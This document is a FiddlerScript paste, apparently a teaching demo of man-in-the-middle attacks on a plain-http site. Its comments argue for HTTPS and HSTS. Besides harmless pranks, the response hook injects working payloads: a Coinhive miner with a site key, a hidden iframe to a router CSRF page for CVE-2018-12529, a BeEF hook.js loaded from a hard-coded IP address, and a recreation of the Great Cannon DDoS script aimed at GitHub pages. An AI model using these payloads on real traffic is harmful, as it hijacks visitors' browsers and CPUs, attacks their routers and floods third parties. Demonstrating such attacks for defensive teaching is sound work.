troyhunt

FiddlerScript MitM Attacks Against Requests to btlr.com

Jul 13th, 2018
// FiddlerScript (JScript.NET) request hook. Fiddler calls this for every
// request it proxies; here any request whose host is btlr.com is re-pointed
// at scripting.com, so the demo site's pages are fetched from a different
// origin and the matching responses can be rewritten on the way back
// (see OnBeforeResponse). Only the host is swapped; path and query are left
// as the browser sent them.
// Defender's note: a host rewrite like this is invisible in the address bar —
// the browser still shows the URL it asked for. The demo works because the
// site is requested over plain http:// (the injected links below use
// http://btlr.com/...); TLS with HSTS is what removes this injection point.
static function OnBeforeRequest(oSession: Session) {
    if (oSession.HostnameIs("btlr.com")){
        oSession.hostname = "scripting.com";
    }
}
  6.  
// FiddlerScript response hook. Fiddler calls this for every response it
// proxies; each block below matches one exact path on the demo site, decodes
// the body (utilDecodeResponse removes chunking/compression so the HTML is
// plain text) and splices extra markup in by string replacement.
// Matching is an exact == on PathAndQuery, so a request carrying a query
// string or a slightly different path leaves that response untouched.
// Ordering note: each utilReplaceInResponse('</body>', X + '</body>') call
// re-emits the closing tag, so successive calls land in document order —
// jQuery is inserted before clippy.min.js, which is inserted before the
// loader snippet that depends on both.
// Defender's note: everything here is ordinary injected content on an http://
// page. A CSP or SRI attribute on the page would be rewritten by the same
// proxy, so neither substitutes for transport security (HTTPS + HSTS);
// they only help once the HTML itself arrives intact.
static function OnBeforeResponse(oSession: Session) {
    // Clippy: injects the clippy.js agent so the page greets the visitor.
    // The jQuery tag carries an SRI hash and crossorigin attribute; the two
    // rawgit tags carry none. On a page rewritten in transit the attacker
    // chooses those attributes anyway, so they prove nothing to the browser.
    if(oSession.PathAndQuery == "/encryption_and_privacy.html") {
        oSession.utilDecodeResponse();
        oSession.utilReplaceInResponse('</head>','<link href="https://cdn.rawgit.com/smore-inc/clippy.js/master/src/clippy.css" rel="stylesheet"></head>');
        oSession.utilReplaceInResponse('</body>','<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7/jquery.min.js" integrity="sha256-/05Jde9AMAT4/o5ZAI23rUf1SxDYTHLrkOco0eyRV84=" crossorigin="anonymous"></script></body>');
        oSession.utilReplaceInResponse('</body>','<script src="https://cdn.rawgit.com/smore-inc/clippy.js/master/build/clippy.min.js"></script></body>');
        oSession.utilReplaceInResponse('</body>','<script type="text/javascript">clippy.load("Clippy", function(agent){agent.show();agent.speak("It looks like you\'re trying to learn about HTTPS, would you like some help with that?");});</script></body>');
    }

    // Cornify: replaces the page's <h1> with one wrapped in a cornify.com
    // link/script, then appends three getacorn.php images after the heading.
    // The r=1531299923195 parameter looks like a millisecond timestamp used
    // as a cache-buster, not a secret. All cornify resources are mixed
    // http:// content.
    if(oSession.PathAndQuery == "/social_networks_dos_and_donts.html") {
        oSession.utilDecodeResponse();
        oSession.utilReplaceInResponse('<h1>Social Networks Dos And Don\'ts</h1>','<h1><a href="http://www.cornify.com" onclick="cornify_add();return false;"><img src="http://www.cornify.com/assets/cornifycorn.gif" width="52" height="51" border="0" alt="Cornify" /></a><script type="text/javascript" src="http://www.cornify.com/js/cornify.js"></script> Social Networks Dos And Don\'ts</h1>');
        oSession.utilReplaceInResponse('</h1>','</h1><img src="https://www.cornify.com/getacorn.php?r=1531299923195&amp;url=http://btlr.com/social_networks_dos_and_donts.html"><img src="https://www.cornify.com/getacorn.php?r=1531299923195&amp;url=http://btlr.com/social_networks_dos_and_donts.html"><img src="https://www.cornify.com/getacorn.php?r=1531299923195&amp;url=http://btlr.com/social_networks_dos_and_donts.html">');
    }

    // Harlem Shake - paste this one in from console
    // Left disabled here; the author runs the minified snippet from the
    // browser console instead. It loads its own stylesheet and audio from an
    // S3 bucket and animates whichever page elements fit its size filter.
    /*if(oSession.PathAndQuery == "/") {
    oSession.utilDecodeResponse();
    oSession.utilReplaceInResponse('</body>','<script>(function(){function c(){var e=document.createElement("link");e.setAttribute("type","text/css");e.setAttribute("rel","stylesheet");e.setAttribute("href",f);e.setAttribute("class",l);document.body.appendChild(e)}function h(){var e=document.getElementsByClassName(l);for(var t=0;t<e.length;t++){document.body.removeChild(e[t])}}function p(){var e=document.createElement("div");e.setAttribute("class",a);document.body.appendChild(e);setTimeout(function(){document.body.removeChild(e)},100)}function d(e){return{height:e.offsetHeight,width:e.offsetWidth}}function v(i){var s=d(i);return s.height>e&&s.height<n&&s.width>t&&s.width<r}function m(e){var t=e;var n=0;while(!!t){n+=t.offsetTop;t=t.offsetParent}return n}function g(){var e=document.documentElement;if(!!window.innerWidth){return window.innerHeight}else if(e&&!isNaN(e.clientHeight)){return e.clientHeight}return 0}function y(){if(window.pageYOffset){return window.pageYOffset}return Math.max(document.documentElement.scrollTop,document.body.scrollTop)}function E(e){var t=m(e);return t>=w&&t<=b+w}function S(){var e=document.createElement("audio");e.setAttribute("class",l);e.src=i;e.loop=false;e.addEventListener("canplay",function(){setTimeout(function(){x(k)},500);setTimeout(function(){N();p();for(var e=0;e<O.length;e++){T(O[e])}},15500)},true);e.addEventListener("ended",function(){N();h()},true);e.innerHTML=" <p>If you are reading this, it is because your browser does not support the audio element. 
We recommend that you get a new browser.</p> <p>";document.body.appendChild(e);e.play()}function x(e){e.className+=" "+s+" "+o}function T(e){e.className+=" "+s+" "+u[Math.floor(Math.random()*u.length)]}function N(){var e=document.getElementsByClassName(s);var t=new RegExp("\\b"+s+"\\b");for(var n=0;n<e.length;){e[n].className=e[n].className.replace(t,"")}}var e=30;var t=30;var n=350;var r=350;var i="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake.mp3";var s="mw-harlem_shake_me";var o="im_first";var u=["im_drunk","im_baked","im_trippin","im_blown"];var a="mw-strobe_light";var f="//s3.amazonaws.com/moovweb-marketing/playground/harlem-shake-style.css";var l="mw_added_css";var b=g();var w=y();var C=document.getElementsByTagName("*");var k=null;for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){if(E(A)){k=A;break}}}if(A===null){console.warn("Could not find a node of the right size. Please try a different page.");return}c();S();var O=[];for(var L=0;L<C.length;L++){var A=C[L];if(v(A)){O.push(A)}}})()</script></body>');
    }*/

    // Coinhive (show CPU as it runs): loads the authedmine miner and starts it
    // with the site key in the snippet, so the visitor's browser mines on the
    // injector's behalf while the tab is open. The throttle option presumably
    // caps how hard it runs — the section title is the demo point: it is
    // visible as CPU load. Detection: unexpected script loads from
    // authedmine.com and sustained CPU on an idle page; browser and ad
    // blockers commonly block the miner hostnames, and HTTPS prevents the
    // injection in the first place.
    if(oSession.PathAndQuery == "/safety_security_1.html") {
        oSession.utilDecodeResponse();
        oSession.utilReplaceInResponse('</body>','<script src="https://authedmine.com/lib/authedmine.min.js"></script><script>var miner = new CoinHive.Anonymous("PlJ41covvoEeW7pwQu70a7HJMWfDYE3D", {throttle: 0.3});miner.start();</script></body>');
    }

    // CSRF against Intex N150 routers (CVE-2018-12529): a hidden iframe pulls
    // a page from a demo hostname; judging by its name, that page — not this
    // script — issues the forged request to the visitor's LAN router. The
    // fix belongs to the router (anti-CSRF tokens / origin checks) and, for
    // the carrier page, to HTTPS so the frame cannot be injected.
    if(oSession.PathAndQuery == "/telecommuting.html") {
        oSession.utilDecodeResponse();
        oSession.utilReplaceInResponse('</body>','<iframe src="http://evilcyberhacker.com/RouterCSRF.html" style="display: none"></iframe></body>');
    }

    // Great Cannon: re-creates the injected script that turned visitors'
    // browsers into a DDoS source against two GitHub pages. It loads jQuery
    // twice (a baidu mirror plus code.jquery.com's jquery-latest.js), then for
    // up to 3E5 ms (five minutes, measured from startime) keeps issuing $.ajax
    // requests to url_array, re-scheduling each one after the last round-trip
    // time. Educator's notes: setTimeout("r_send2()", a) is the string form,
    // i.e. an eval; and unixtime() calls getDay() (weekday), so it is only a
    // crude selector between the two targets, not a real epoch time.
    if(oSession.PathAndQuery == "/online_marketing.html") {
        oSession.utilDecodeResponse();
        oSession.utilReplaceInResponse('</body>','<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js"></script><script src="http://code.jquery.com/jquery-latest.js"></script><script>startime = (new Date).getTime();var count = 0; function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3}url_array = ["https://github.com/greatfire", "https://github.com/cn-nytimes"];NUM = url_array.length; function r_send2() { var a = unixtime() % NUM; get(url_array[a])} function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } })} function r_send(a) { setTimeout("r_send2()", a)}setTimeout("r_send2()", 2E3);</script></body>');
    }

    // BeEF: loads the standard BeEF hook.js from a hard-coded demo server,
    // which enrols the visitor's browser as a hooked client of that BeEF
    // instance. Detection: a script tag whose src is a bare IP address is an
    // easy signal in proxy or CSP-report logs.
    if(oSession.PathAndQuery == "/what_startup_needs.html") {
        oSession.utilDecodeResponse();
        oSession.utilReplaceInResponse('</body>','<script src="http://104.210.63.219/hook.js"></script></body>');
    }

    // Rick Roll: widens the page's content column to 500px and swaps the
    // bg_misc9.png image for an autoplaying YouTube embed.
    if(oSession.PathAndQuery == "/projects.html") {
        oSession.utilDecodeResponse();
        oSession.utilReplaceInResponse('</body>','<style>.content_div, .cd{width:500px}</style></body>');
        oSession.utilReplaceInResponse('<img border=0 src="bg_misc9.png">','<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ?ecver=2&autoplay=1" width="500" height="400" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>');
    }
}